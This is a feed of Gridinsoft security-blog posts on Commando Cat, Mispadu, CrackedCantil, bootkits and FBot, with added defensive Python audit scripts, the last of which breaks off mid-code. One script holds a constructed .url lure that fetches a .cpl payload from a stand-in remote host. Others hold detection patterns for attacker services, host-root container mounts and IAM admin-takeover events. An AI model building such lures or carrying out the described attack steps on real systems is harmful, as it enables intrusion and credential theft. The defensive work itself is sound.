Threats Archives – Gridinsoft Blog (https://gridinsoft.com/blogs/tag/threats/). Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Feed generated Sun, 25 Feb 2024 06:45:44 +0000.

Docker API Vulnerability Exploited in Cryptojacking Campaign
https://gridinsoft.com/blogs/docker-api-vulnerability-cryptojacking-campaign/
Published Tue, 06 Feb 2024 14:09:32 +0000

The post Docker API Vulnerability Exploited in Cryptojacking Campaign appeared first on Gridinsoft Blog.

A new campaign named “Commando Cat” abuses Docker API endpoints that are exposed to the Internet. It uses the Docker API to gain initial access to a host and then deploys a series of malicious payloads, ending in cryptocurrency mining on the compromised machines.

Docker API Vulnerability Exploited

Investigators have discovered a new malware campaign aimed at Docker API endpoints. The malware, called Commando Cat, takes advantage of misconfigured, publicly reachable Docker APIs to run commands on the affected hosts. According to the report, Commando Cat has nine distinct modules covering several tasks: downloading and executing additional payloads, scanning for open ports and vulnerable services, stealing credentials and sensitive data, mining cryptocurrency, launching distributed denial-of-service (DDoS) attacks, and spreading to other containers and hosts.

The campaign was first detected in January 2024, which makes it the second Docker-related campaign identified in 2024, after the malicious deployment of the 9hits traffic exchange application. In this case, specialists observed a spike in malicious activity from a single IP address in China and traced it to a Docker container on a cloud server infected by Commando Cat. The malware had reached the Docker API through an exposed port and executed a series of commands to download and run its modules.

Commando Cat Attacks Docker

Commando Cat delivers its payloads to Docker API instances exposed to the Internet. The attacker instructs the Docker daemon to pull an image from the cmd.cat project (“Commando”), a service that generates Docker images containing whatever command-line tools are requested; a stock image from a legitimate project is less likely to raise suspicion than a custom one. The container is created with the host’s root filesystem mounted into it, and the attacker then runs “chroot” into that mount to operate on the host’s operating system. This is not a container-escape exploit: it works only because whoever controls the Docker API can request any bind mount. The initial command looks for the services “sys-kernel-debugger,” “gsc,” “c3pool_miner,” and “dockercache,” all of which the attacker creates after infection, so their presence means the host is already compromised.

[Figure: the command that checks whether these services are active on the system]

Experts also believe the attacker checks for the “sys-kernel-debugger” service to avoid competing with another campaign. Once these checks pass, the attacker reruns the container with a different command that infects the host by copying specific binaries onto it. The binaries are renamed along the way to evade detection, a common tactic in cryptojacking campaigns. The attacker also deploys various payloads with parameters like “tshd,” “gsc,” and “aws.”

The final payload is delivered as a base64-encoded script. It deploys the XMRig cryptominer and “secures” the Docker install on the infected host for its own use: it first removes containers matching a specific command, then removes every container whose command does not contain “chroot,” that is, everything that is not its own. It kills competing mining services before setting up its miner and uses a systemd service to keep the XMRig stager persistent. The docker-cache and docker-proxy services are hidden with a “hid” script. Finally, Commando Cat blackholes the Docker registry so that no further images can be pulled, locking out competing campaigns.

Safety Tips

Protecting against a threat as sophisticated as Commando Cat may look challenging: its detection evasion makes it hard for classic security solutions to catch. Still, the campaign depends entirely on reaching a Docker API from the Internet, and there are enough measures to make it far less of a threat.

  • Do not expose the Docker API. The daemon should listen on its Unix socket only; if remote access is unavoidable, bind it to a specific interface, require TLS client certificates, and firewall the port (2375/2376 by default) so that only management hosts can reach it. Also restrict outbound connections from containers so a compromised one cannot fetch payloads or reach mining pools.
  • Employ XDR. Extended Detection and Response systems analyze network traffic and host telemetry for anomalies; suspicious activity, such as a container created with the host root filesystem bind-mounted or new systemd units with the service names listed above, should raise an alert. Network monitoring can likewise flag unusual traffic to the Docker API port.
  • Training and Awareness. Training users on secure Docker usage and basic cybersecurity practices prevents most of these problems. Educated users are also less likely to fall for social engineering or mishandle data.
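As an added example (not code from the Gridinsoft post or from the research it summarises), the following Python audit script turns the points above into checks an operator can run on a host: whether dockerd is configured to listen on TCP, which running containers match the attack pattern (host root bind-mounted, a chroot in the container command, an image pulled from the cmd.cat project, or a privileged container), and whether any of the attacker-created service names exist as systemd units. All inputs in the block are constructed samples: the container and image names, the daemon.json content and the unit list are made up for illustration, and the `cmd.cat/chattr` image name is the editor's assumption of what a pull from that project looks like.

```python
import json
import shlex

# Service names the post lists as created by the attacker after infection.
ATTACKER_SERVICES = {"sys-kernel-debugger", "gsc", "c3pool_miner", "dockercache"}

# Constructed sample inputs (not captured from a real host).
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
SAMPLE_EXEC_START = "/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock"
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web",
        "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
    },
    {
        "Name": "/heuristic_knuth",
        "Config": {
            "Image": "cmd.cat/chattr",  # assumed image name from the cmd.cat project
            "Cmd": ["sh", "-c", "chroot /host sh -c 'systemctl is-active sys-kernel-debugger'"],
        },
        "HostConfig": {"Binds": ["/:/host"], "Privileged": False},
    },
])
SAMPLE_UNITS = ["ssh.service", "gsc.service", "cron.service", "docker.service"]


def daemon_tcp_exposure(daemon_json_text, exec_start_line):
    """Return the tcp:// listen addresses configured for dockerd.

    dockerd takes hosts from the "hosts" array in /etc/docker/daemon.json and
    from -H/--host on its command line (the ExecStart of docker.service).
    tcp://0.0.0.0:2375 or tcp://[::]:2375 means the unauthenticated API is
    reachable from every interface.
    """
    hosts = []
    if daemon_json_text.strip():
        hosts.extend(json.loads(daemon_json_text).get("hosts", []))
    argv = shlex.split(exec_start_line)
    for i, arg in enumerate(argv):
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
    return [h for h in hosts if h.startswith("tcp://")]


def suspicious_containers(inspect_json_text):
    """Flag containers in `docker inspect` output that match the attack pattern.

    Returns a list of (container name, [reasons]).
    """
    findings = []
    for c in json.loads(inspect_json_text):
        reasons = []
        name = c.get("Name", "").lstrip("/")
        config = c.get("Config", {})
        host_cfg = c.get("HostConfig", {})
        image = config.get("Image", "")
        cmd = " ".join(config.get("Cmd") or [])
        # A bind whose host side is "/" hands the entire host filesystem to the container.
        if any(b.split(":", 1)[0] == "/" for b in host_cfg.get("Binds") or []):
            reasons.append("host root filesystem bind-mounted")
        if "chroot" in cmd:
            reasons.append("container command chroots into a mount")
        if image.startswith("cmd.cat/"):
            reasons.append("image pulled from the cmd.cat project")
        if host_cfg.get("Privileged"):
            reasons.append("privileged container")
        if reasons:
            findings.append((name, reasons))
    return findings


def attacker_services_present(unit_names):
    """Return the attacker-created service names found in a systemd unit list."""
    bare = {u[:-len(".service")] if u.endswith(".service") else u for u in unit_names}
    return sorted(bare & ATTACKER_SERVICES)


if __name__ == "__main__":
    print("TCP listeners:", daemon_tcp_exposure(SAMPLE_DAEMON_JSON, SAMPLE_EXEC_START))
    for name, reasons in suspicious_containers(SAMPLE_INSPECT):
        print(f"container {name}: " + "; ".join(reasons))
    print("attacker services:", attacker_services_present(SAMPLE_UNITS))
```

On a real host, feed the functions the contents of /etc/docker/daemon.json, the ExecStart line from `systemctl cat docker`, the output of `docker inspect $(docker ps -q)`, and the unit names from `systemctl list-units --type=service --all --plain --no-legend`. A hit on any check is worth an incident ticket on its own; the combination of a TCP listener and a container with the host root mounted is the campaign in one line.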

Mispadu Banking Trojan Exploits SmartScreen Flaw
https://gridinsoft.com/blogs/mispadu-banking-trojan-exploits-smartscreen-flaw/
Published Mon, 05 Feb 2024 14:03:26 +0000

Recent research uncovers a new sample of Mispadu malware that uses a SmartScreen bypass flaw to integrate itself into the system. This banking trojan from 2019 uses the vulnerability discovered in late 2023 to target mainly LATAM users.

Mispadu Trojan Uses SmartScreen Bypass

The extensive research on Mispadu malware done by Unit 42 underscores, among other things, the use of a critical Windows vulnerability to circumvent SmartScreen protection. The flaw, CVE-2023-36025, was discovered and patched by Microsoft in November 2023. As of early February 2024 several malware families already exploit it, which shows that many systems remain unpatched. Earlier we wrote about a Phemedrone Stealer campaign that uses the same detection evasion approach.

The flaw is rather easy to exploit: all that is needed is a specially crafted Internet Shortcut (.url) file. When the victim opens it, the SmartScreen check that would normally warn about running a potentially dangerous downloaded file is bypassed, so Windows shows no warning. In the background, the shortcut makes the system connect to the attackers’ server and fetch the payload as a binary file.

[Figure: contents of the URL file used to download the Mispadu banker]

The cybercriminals behind Mispadu commonly use email spam to deliver these crafted URL files. Other channels may work even better, for example sharing the file via social media, as the Phemedrone operators do.
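As an added example (not the post's or Unit 42's code), here is a small Python triage for Internet Shortcut (.url) files of the kind shown in the figure above. The heuristics are the editor's own: a shortcut whose URL= points at a file:// resource on a remote host (an SMB or WebDAV share) ending in an executable extension has the shape of the lures that abuse this bypass, while an https:// link to a web page is what a legitimate .url looks like. Both samples are constructed and the host address comes from the documentation range; the exact layout of the real Mispadu lure is not reproduced here.

```python
import configparser
from urllib.parse import urlparse

# File types that run code when opened; a .url pointing at one of these is a lure.
EXECUTABLE_EXT = {"exe", "cpl", "dll", "scr", "lnk", "js", "jse", "vbs", "hta",
                  "bat", "cmd", "ps1", "msi"}

# Constructed samples; 203.0.113.0/24 is reserved for documentation.
SAMPLE_LURE = """[InternetShortcut]
URL=file://203.0.113.10/dav/Factura_0423.pdf.cpl
IconIndex=3
IconFile=C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe
"""
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://gridinsoft.com/blogs/
"""


def parse_url_file(text):
    """Return the URL= target of an [InternetShortcut] file, or None if it is not one."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    if not cp.has_section("InternetShortcut"):
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def triage_url_file(text):
    """Classify a .url file as ('benign'|'suspicious'|'invalid', [reasons])."""
    target = parse_url_file(text)
    if target is None:
        return ("invalid", ["no [InternetShortcut] section with a URL= value"])
    reasons = []
    u = urlparse(target.replace("\\", "/"))  # Windows accepts backslashes in these URLs
    host, path = u.netloc, u.path
    if u.scheme == "file" and not host and path.startswith("//"):
        # UNC form file:////server/share/...: the host is the first path component.
        host, _, rest = path[2:].partition("/")
        path = "/" + rest
    leaf = path.rsplit("/", 1)[-1]
    ext = leaf.rsplit(".", 1)[-1].lower() if "." in leaf else ""
    if u.scheme == "file" and host:
        reasons.append(f"file:// target on remote host {host} (SMB/WebDAV fetch)")
    if ext in EXECUTABLE_EXT:
        reasons.append(f"target is an executable type (.{ext})")
        if leaf.count(".") >= 2:
            reasons.append("double extension hides the executable type")
    return ("suspicious" if reasons else "benign", reasons)


if __name__ == "__main__":
    for label, sample in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, triage_url_file(sample))
```

Run it over every .url attachment a mail gateway or EDR quarantines: the "remote host" reason alone is enough to block, since nothing legitimate ships a shortcut that fetches a file from an outside share, and it catches the lure even on a machine that is already patched.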

What is Mispadu Malware?

Mispadu itself is a rather unique example of a banking trojan that emerged back in 2019. It is distinctive for its peculiar region check, persistent code encryption, and heavy obfuscation. For instance, to decide whether it is running in a prohibited region, it does not use a “traditional” IP address ban list. Instead, Mispadu checks the offset of the current system time from UTC and stops executing if the value exceeds a set limit. A practical consequence for analysts: a sandbox whose clock is set to a time zone outside the targeted range never sees the payload run.

[Figure: the equation the malware evaluates to decide whether it may run in the region]

This financial infostealer targets a range of financial websites, looking for matches in the browsing history. Once Mispadu finds a site from its target list, it looks up the saved password in the browser’s AutoFill data and sends it to the command server. As a result, the operators get a full set of credentials for financial services.

Despite having a flexible solution for targeting different banking and crypto services in different countries, the stealer focuses mainly on services from the Americas and Western Europe. It is not clear whether this selection is related to the location of the operators or to other factors.

How to Protect Yourself?

Malware like Mispadu is severe, but it can rarely be called unavoidable. It exploits a well-known flaw that is fixed in current Windows updates, so simply updating the system removes the primary injection vector this malware employs.

Nonetheless, keep in mind that the file itself reaches the target system in a spam email. Email remains the main propagation method for malware, scams and phishing attacks. Knowing how to distinguish a phishing email from a genuine one greatly reduces the chance of getting into trouble at all.

Use reliable anti-malware software as an additional protection layer. Everyone can make a mistake, and that’s completely normal – only those who do nothing never make one. To get yourself backed up for such cases, I’d recommend using GridinSoft Anti-Malware – a reliable, lightweight, and easy-to-use anti-malware software. Its advanced detection mechanisms will be able to detect and stop any malware at its very beginning.

CrackedCantil Dropper Delivers Numerous Malware
https://gridinsoft.com/blogs/crackedcantil-dropper-malware/
Published Fri, 02 Feb 2024 22:18:11 +0000

CrackedCantil is a distinctive dropper that works with a wide variety of malware families; a single infection can effectively mean up to five other malware types running on the system. Let’s break down what it is, how it spreads, and why it is so dangerous.

What is CrackedCantil?

CrackedCantil is a dropper discovered and described by the malware analyst LambdaMamba. The name has two parts: “Cracked,” for the software cracks that are its primary spreading vector, and “Cantil,” for the cantil viper, a highly venomous species, suggesting the malware’s harmful potential. By its nature, CrackedCantil is a loader/dropper aimed at delivering many different malware samples, including stealers, ransomware, spyware and backdoors.

[Figure: the CrackedCantil process tree (source: ANY.RUN)]

Overview of distribution ways

The main way to spread such malware is through the use of cracked software. People looking for free versions of paid software often resort to downloading “cracked” versions. These versions are often legitimate software modified to bypass licensing mechanisms. However, attackers use this demand for cracked software as a means to spread malware.

The process begins on questionable websites or forums. After downloading and running what looks like an installer, malware is installed on the user’s computer. This may be disguised as useful files or integrated into the installation executables. Once activated, the malware begins infecting the system, a process that may include several actions. Then it can install additional malware, steal data, encrypt files for ransom, and turn the infected device into part of a botnet.

CrackedCantil Delivers Droppers, Spyware and Ransomware

The tree of processes involved in the incident is quite complicated, and several infamous malware families were found to be involved. Let’s look at these families in the overall threat picture, focusing on the role of each in the symphony of cyberattacks.

PrivateLoader

PrivateLoader works as a polymorphic downloader that uses various obfuscation and packaging techniques to evade detection by antivirus programs. It is written in C++ and is often distributed with cracked software. It is also capable of downloading and executing additional malicious modules from remote control servers. Also, PrivateLoader often includes features to check the execution environment to avoid running in virtual machines or analysis environments, making it difficult for security researchers to investigate and analyze.

SmokeLoader

SmokeLoader, also known as Dofoil, is a “loader” type malware used to spread additional malware such as backdoors, keyloggers, and Trojans. It is also capable of stealing information. SmokeLoader can inject malicious code into system processes, thereby evading detection.

[Figure: C2 panel of the SmokeLoader backdoor]

Lumma

Lumma is an infostealer that received quite a bit of attention over the last few months. It can extract personal and financial data from a variety of sources on infected computers, including web browsers, email clients, and cryptocurrency wallet files. Most commonly, Lumma Stealer propagates through social engineering and phishing attacks. It can also evade antivirus detection and transmit collected data to a remote command and control (C&C) server.

RedLine

RedLine Stealer is a malicious program designed to steal various types of sensitive information from infected computers. It can extract browser credentials, credit card data, e-wallet passwords, and system information. First seen in 2020, it has quickly become one of the most popular stealers on the malware market.

[Figure: Telegram bot that the malware developers use to promote RedLine]

Socks5Systemz

Socks5Systemz is a malware that infects devices through PrivateLoader and Amadey. Infected devices are turned into traffic-forwarding proxies for malicious traffic, and the malware connects to its C2 server with a DGA.

STOP/Djvu Ransomware

STOP ransomware is an encryptor recognizable by the unique extension it appends to encrypted files (.hhaz, .cdaz, .cdcc and the like) and by the ransom text file it drops with instructions for the victim on how to pay and obtain the decryptor. Djvu is a variant of STOP that can include multiple levels of stealth, making it harder to analyze. STOP/Djvu encrypts files using AES-256 and Salsa20. It is known to be delivered alongside other malware, such as infostealers, which take sensitive information before the encryption runs.

[Figure: the outcome of Djvu ransomware, encrypted files]

How dangerous is CrackedCantil?

CrackedCantil is another player on the dropper market, but its ability to coordinate different types of malware sets it apart. It creates a so-called “symphony of malware” in which each element is tuned for maximum impact. Its growing popularity points to its effectiveness in both detection evasion and malware delivery, and distribution is huge because it rides on users’ desire to get paid software for free.

To avoid infection through cracked programs, the following precautions are recommended:

  • Always purchase software from official vendors or directly from the developers. This not only ensures the legitimacy of your software, but also ensures that you receive all necessary security updates.
  • Regularly update all installed programs and the operating system. This helps protect your system from vulnerabilities that can be exploited by malware.
  • Use a reliable antivirus solution and scan your system regularly. Modern antivirus programs frequently update their databases to recognize new threats.
  • Increase your and your employees’ knowledge of cyber threats and social engineering techniques. Knowing how threats spread can significantly reduce the risk of exposure.

What is a Bootkit? Explanation & Protection Guide
https://gridinsoft.com/blogs/what-is-bootkit/
Published Fri, 26 Jan 2024 09:05:36 +0000

Bootkits are an unusual and rarely discussed, though widely used, kind of malware. They operate beneath the surface, embedding themselves in a computer’s boot chain so that they activate before the operating system (OS) even starts. But why do they need such deep integration? And where are they used? Let’s find out.

What is a Bootkit?

A bootkit is a sophisticated type of malware that starts and operates even before the operating system starts – during the boot process. Unlike many other malware types that target software vulnerabilities or user actions, bootkits embed themselves in the system’s boot process, making them exceptionally challenging to detect and remove.

[Figure: type of bootkit]

One of the defining characteristics of a bootkit is its ability to load before the operating system (OS) itself. This gives the attacker a significant advantage, as they can intercept and manipulate the boot process, allowing them to gain control over the system even before the user logs in. Being integrated that close to the bare metal also opens the possibility of exploiting kernel-level vulnerabilities and hardware flaws.

[Figure: bootkit history]

Bootkits vs. Rootkits

While often confused, bootkits and rootkits operate at different levels of a system. A rootkit infects the OS after it has loaded and hides there with the highest privileges it can get, typically in the kernel. A bootkit is embedded in the boot chain itself, in the bootloader, the boot sectors or even the motherboard firmware, and therefore runs before the OS and any of its defenses. This changes both the capabilities and the purpose of the bootkit. What the two have in common is that both are advanced, high-severity threats.

Functionalities of Bootkits

Bootkits are versatile in their malicious functionalities. To understand and combat these malicious entities effectively, we must dissect the intricacies of their functionalities.

  • Persistence. The primary functionality of bootkits is persistence. They implant themselves where the firmware looks for boot code: the MBR or VBR boot sectors on legacy BIOS systems, the bootloader on the EFI System Partition on UEFI/GPT systems, or the firmware flash itself. This positioning lets them survive reboots and, unless the boot partition or firmware is rewritten, operating system reinstalls, which is what makes their removal so challenging.
  • Data Theft. Some bootkits are engineered to steal sensitive data from the compromised system. During the boot process, they may intercept and exfiltrate data such as login credentials, financial information, personal files, and any other valuable data they can access.
  • Backdoor Access. Bootkits can create backdoors within the system, which provide unauthorized remote access to the compromised computer. Adversaries will be able to execute commands, upload additional malware, or manipulate the system as they see fit. It essentially grants them a persistent presence on the compromised device.
  • Bypassing security measures. One of the key traits of bootkits is their ability to circumvent security measures. They load themselves into the system’s memory before any security software or antivirus programs have a chance to activate. As a result, they can operate undetected and unimpeded by security tools, allowing them to carry out their malicious activities without being stopped.

Can I detect and remove the bootkit?

The most effective way to stop a bootkit is to catch it before it is written to the firmware or the boot partition of the disk. Detecting an existing bootkit infection is not easy, and even once it is detected, removing it can be harder still.

If the bootkit has been written to the EFI System Partition, an operating system reinstall removes it only if that partition is wiped and recreated; a reinstall that keeps the existing boot partition leaves the implant in place. Even that is not enough if the malware managed to infect the firmware, in which case the freshly installed system is compromised again at the next boot. In such cases, determine which bootkit has infected the system and use a LiveCD antivirus utility, or a firmware reflash from the hardware vendor, to clean the system of malicious code.

How to Prevent Bootkits

Preventing bootkit malware requires taking several measures to reduce the risk of infection. Here are some steps that can be taken:

  1. Secure Boot and UEFI
    Secure Boot is a feature of UEFI-enabled computers. Its purpose is to ensure that only signed, trusted software is loaded during the boot process, which blocks an unsigned bootloader implant. Still, the BlackLotus UEFI bootkit has shown that Secure Boot can be bypassed by abusing a vulnerable but validly signed bootloader, so those old bootloaders have to be revoked (via the UEFI forbidden-signature database, DBX) for the protection to hold.
  2. Update Your System
    Keeping your operating system and security software up-to-date can prevent bootkit malware from infecting your computer. Pay attention to firmware updates as well: although rare, UEFI/BIOS vulnerabilities exist, too, and may be exploited in different scenarios.
  3. Use antivirus software
    While antivirus software cannot detect every bootkit, it can stop the infection at an early stage, i.e. the dropper or the driver that writes to the boot partition. Tools that verify the boot chain, such as measured boot reports, are also useful for spotting threats that integrate at such a low level.
  4. Be cautious when downloading software
    It is crucial to download software from trusted sources only, especially when we talk about hardware control utilities and drivers. Those two integrate deep enough into the system to allow their exploitation for bootkit injection.
  5. Use a hardware-based solution
    Hardware-based solutions such as a Trusted Platform Module (TPM) help against bootkits by measuring every component of the boot chain into the TPM (measured boot). The TPM does not block a modified bootloader on its own, but a disk-encryption key or an attestation check bound to those measurements fails when the chain changes, which turns a stealthy bootkit into a visible failure.
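The detection section and the prevention list above both come down to one question: has anything in the boot chain changed since a known-good state? As an added example (not code from the Gridinsoft post), the Python below answers it for the part an operator can check from a running Linux system: it hashes every file on the mounted EFI System Partition into a baseline, reports what was added, removed or altered on a later run, and reads the Secure Boot state from the UEFI variable Linux exposes through efivarfs. The `demo()` function builds a stand-in ESP in a temporary directory with constructed fake bootloader files, so the block runs without touching a real boot partition; the mount point `/boot/efi` mentioned in the usage note is the common default, not something the page states.

```python
import hashlib
import json
import os
import shutil
import tempfile

# SecureBoot UEFI variable as exposed by Linux efivarfs (EFI global variable GUID).
SECUREBOOT_VAR = "/sys/firmware/efi/efivars/SecureBoot-8be4df61-93ca-11d2-aa0d-00e098032b8c"


def hash_tree(root):
    """Map each file under root (path relative to root, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 20), b""):
                    h.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digests[rel] = h.hexdigest()
    return digests


def write_baseline(root, baseline_path):
    """Hash the tree and store the result as JSON; keep that file off the ESP itself."""
    digests = hash_tree(root)
    with open(baseline_path, "w") as f:
        json.dump(digests, f, indent=2, sort_keys=True)
    return digests


def compare_to_baseline(root, baseline_path):
    """Report files added, removed or changed since the baseline was taken."""
    with open(baseline_path) as f:
        old = json.load(f)
    new = hash_tree(root)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def secure_boot_enabled(var_path=SECUREBOOT_VAR):
    """True/False from the SecureBoot variable, None where efivarfs is unavailable.

    efivarfs prefixes variable data with a 4-byte attributes word, so the
    single data byte (1 = enabled, 0 = disabled) sits at offset 4.
    """
    try:
        with open(var_path, "rb") as f:
            data = f.read()
    except OSError:
        return None
    return len(data) >= 5 and data[4] == 1


def demo():
    """Baseline a constructed stand-in for an ESP, tamper with it, return the diff."""
    root = tempfile.mkdtemp(prefix="esp-")
    baseline = root + "-baseline.json"
    try:
        for rel, content in {
            "EFI/BOOT/BOOTX64.EFI": b"MZ" + b"\x00" * 64,            # fake bootloaders
            "EFI/Microsoft/Boot/bootmgfw.efi": b"MZ" + b"\x01" * 64,
        }.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(content)
        write_baseline(root, baseline)
        # Simulate a bootkit: replace the Windows boot manager and drop a new loader.
        with open(os.path.join(root, "EFI", "Microsoft", "Boot", "bootmgfw.efi"), "wb") as f:
            f.write(b"MZ" + b"\xff" * 64)
        with open(os.path.join(root, "EFI", "BOOT", "grubx64.efi"), "wb") as f:
            f.write(b"MZ" + b"\x02" * 64)
        return compare_to_baseline(root, baseline)
    finally:
        shutil.rmtree(root, ignore_errors=True)
        if os.path.exists(baseline):
            os.remove(baseline)


if __name__ == "__main__":
    print("Secure Boot:", secure_boot_enabled())
    print(demo())
```

On a real machine, take the baseline right after a clean install (`write_baseline("/boot/efi", ...)` with the ESP mounted there) and store it off the host, then run `compare_to_baseline` from trusted boot media whenever a compromise is suspected. An unexpected "changed" entry for the bootloader is exactly the signal a firmware-level implant is built to hide from the running OS, and a `False` from the Secure Boot check on a system that should have it on is a finding in itself.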

Novice FBot Stealer Targets Cloud Services
https://gridinsoft.com/blogs/fbot-stealer-cloud-services/
Published Tue, 16 Jan 2024 15:57:11 +0000

Researchers report about a new malware strain dubbed FBot. This Python-based malicious program appears to be a unique tool in cybercriminals’ arsenal. Its uniqueness is due to its targeting of web and cloud services. Deeper analysis reveals that it was potentially made for a specific cybercrime group or for the use in specific attacks.

FBot Targets AWS, Twilio and Office365

FBot is a Python-based hacking tool recently analyzed by SentinelOne, notable for its targeting of cloud services and payment platforms. Its primary function is hijacking cloud, SaaS and web services, with a secondary focus on obtaining access for further attacks. Its credential harvesting capability is the most noteworthy feature: it provides initial access and is potentially lucrative through sale to other cybercriminals. In that respect FBot shares a lot with typical stealers, particularly in credential harvesting and account hijacking.

[Figure: console control window of FBot. Source: SentinelOne]

Distinct from other infostealer families, FBot does not lean on the commonly used Androxgh0st code. Instead, it carves its own path, sharing functional and design similarities with the Legion cloud infostealer. Its smaller footprint suggests private development and a targeted distribution strategy. On top of that come extensive capabilities, including tools for hijacking AWS accounts and harvesting credentials for spam attacks, plus specialized functions that target PayPal and various SaaS accounts.

AWS Targeting

There are three functions in FBot designed specifically for attacking AWS accounts. Let’s look at each of them in more detail:

  • AWS API Key Generator
    This function of FBot generates AWS API access keys at random, like cutting duplicate keys for a lock without ever having seen the original, in the hope of hitting a pair that is valid for some account. In practice the key space (a 20-character key ID plus a 40-character secret) makes such guessing hopeless, so the function is notable more for intent than for effectiveness. A key that did work would grant API access without any interactive login for administrators to notice.
  • Mass AWS Checker
    This part of FBot inspects AWS account properties, permissions and services. In particular, it looks into the email configurations of AWS Simple Email Service, focusing on email sending capabilities. Moreover, it takes a step further by trying to set up a new user within the AWS account with administrative access. Such functionality may further be useful for performing massive email spam campaigns.
  • AWS EC2 Checker
    One more function checks the AWS EC2 service permissions and capabilities of the compromised account. FBot checks what resources the account has available, which could be useful for someone planning to utilize these resources without authorization. Further use may be different, as spare calculation power has extremely versatile applications.

Exploiting Payment Services and SaaS Platforms

FBot’s targeting of SaaS and payment services is multifaceted. It includes a PayPal account validation feature, named “paypal_validator,” which checks whether an email address is linked to a PayPal account. It does so by sending a request to a hardcoded URL, oddly using a Lithuanian fashion designer’s website for the check. A list of validated PayPal addresses is a ready-made target list for phishing and payment fraud.

Additionally, FBot targets several SaaS platforms, including Sendgrid and Twilio. For Sendgrid, it has a feature to generate API keys, while for Twilio, it takes input in the form of SID and Auth Token. Similarly to AWS SES, hijacked Sendgrid accounts may further be used in impersonation email scams. Meanwhile, dumping Twilio SID/Auth Token data, malware provides its masters with quite a bit of info regarding the account – currency, balance, connected phone numbers, etc.

Web Framework Vulnerabilities

FBot’s capabilities in targeting web frameworks are particularly focused on exploiting vulnerabilities in various environments. It has a feature for validating if URLs host a Laravel environment file and extracting credentials from these files. This functionality enables FBot to potentially access sensitive configuration information. Additionally, it includes a Hidden Config Scanner, which sends HTTP GET requests to several PHP, Laravel, and AWS-related URIs, looking for stored configuration values. This scanner parses responses for keys and secrets related to a range of services, making it a potent tool for extracting valuable data from compromised web frameworks​​.

Protective Measures

To combat FBot’s threats, it’s crucial to understand its indicators of compromise. These include specific SHA1 hashes and hardcoded AWS IAM usernames and passwords used by FBot. The fight against FBot isn’t just about detection; it’s also about proactive defense.

  • Employ comprehensive antivirus solutions that are regularly updated. Modern antivirus software is equipped with advanced detection capabilities to identify and neutralize malware like FBot. These tools often include real-time monitoring, heuristic analysis, and behavior-based detection, which can be particularly effective against new and evolving threats.
  • FBot may use spamming tactics or exploit network vulnerabilities to gain entry. A robust firewall monitors and controls incoming and outgoing network traffic according to predefined rules; with appropriate rules in place, malicious traffic and unauthorized access attempts are blocked, reducing the risk of FBot reaching your network.
  • Organizations are advised to enable multi-factor authentication (MFA) for AWS and to alert on unusual activity, in particular IAM events such as CreateUser, AttachUserPolicy and CreateAccessKey from unfamiliar principals, probing of SES sending limits, and significant changes in SaaS configurations.
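The Mass AWS Checker behaviour described above (inspect SES sending limits, then create a new user with administrative access) leaves a recognizable trail in CloudTrail, and the last bullet recommends alerting on it. As an added example (not code from the post or from SentinelOne), the Python below implements that alert: it groups CloudTrail records by the calling principal and fires when one principal creates an IAM user, attaches AdministratorAccess to it and mints an access key for it within a short window, noting whether the same principal probed SES first. The field names follow the CloudTrail record format; the account number, identities, addresses and timestamps in the sample are constructed.

```python
from datetime import datetime, timedelta

ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"
TAKEOVER_STEPS = {"CreateUser", "AttachUserPolicy", "CreateAccessKey"}

# Constructed CloudTrail records (field names follow the real record format,
# everything else is made up). The first actor behaves like FBot; the second
# is an ordinary admin creating a colleague's account.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-10T08:01:02Z", "eventSource": "ses.amazonaws.com",
     "eventName": "GetSendQuota", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deploy"},
     "requestParameters": None},
    {"eventTime": "2024-01-10T08:01:09Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deploy"},
     "requestParameters": {"userName": "backup-admin"}},
    {"eventTime": "2024-01-10T08:01:11Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deploy"},
     "requestParameters": {"userName": "backup-admin", "policyArn": ADMIN_POLICY}},
    {"eventTime": "2024-01-10T08:01:12Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deploy"},
     "requestParameters": {"userName": "backup-admin"}},
    {"eventTime": "2024-01-10T09:30:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser", "sourceIPAddress": "203.0.113.5",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"},
     "requestParameters": {"userName": "intern-bob"}},
]


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


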